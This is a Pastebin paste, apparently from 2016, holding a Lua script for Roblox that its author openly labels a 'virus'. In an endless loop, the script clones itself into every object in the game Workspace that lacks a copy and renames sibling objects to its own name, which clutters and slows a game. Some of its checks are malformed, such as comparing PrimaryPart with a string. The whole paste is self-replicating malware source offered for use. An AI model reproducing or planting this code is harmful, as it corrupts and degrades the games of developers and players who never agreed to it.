Advertisement
RyanDaCoder

rip harambe -- Roblox script virus --

Nov 12th, 2016
1,070
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.85 KB | None | 0 0
  1. local all = game.Workspace:GetChildren()
  2.  
  3.  
  4. while true do
  5. wait(.1)
  6. for i = 1, #all do
  7. local find = all[i]:FindFirstChild(script.Name)
  8. if all[i].className == "Model" and all[i].PrimaryPart == "Head" then
  9. eric = 1
  10. wait(.1)
  11. eric = 0
  12. else if script.Name == find then
  13. eric = 1
  14. wait(.1)
  15. eric = 0
  16. else if find ~= nil then
  17. eric = 1
  18. wait(.1)
  19. eric = 0
  20. else
  21. q = script
  22. w = q:clone()
  23. q = w:clone()
  24. q.Parent = all[i]
  25. end
  26. end
  27. end
  28. end
  29.  
  30. local sll = script.Parent:GetChildren()
  31.  
  32. for i = 1, #sll do
  33. local finds = game.Workspace:FindFirstChild(script.Name)
  34. sll[i].Name = script.Name
  35. if script.Parent.className == "Model" and script.Parent.PrimaryPart == "Head" then
  36. eric = 1
  37. wait(.1)
  38. eric = 0
  39. else if finds ~= nil then
  40. eric = 1
  41. wait(.1)
  42. eric = 0
  43. else
  44. q = script
  45. w = q:clone()
  46. q = w:clone()
  47. q.Parent = game.Workspace
  48. end
  49. end
  50. end
  51. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement